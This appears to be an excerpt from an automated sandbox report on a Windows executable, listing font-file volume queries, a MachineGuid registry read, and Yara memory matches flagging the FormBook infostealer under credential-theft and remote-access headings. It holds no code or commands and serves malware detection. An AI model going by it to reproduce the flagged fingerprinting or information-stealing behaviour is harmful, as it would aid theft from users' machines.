Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE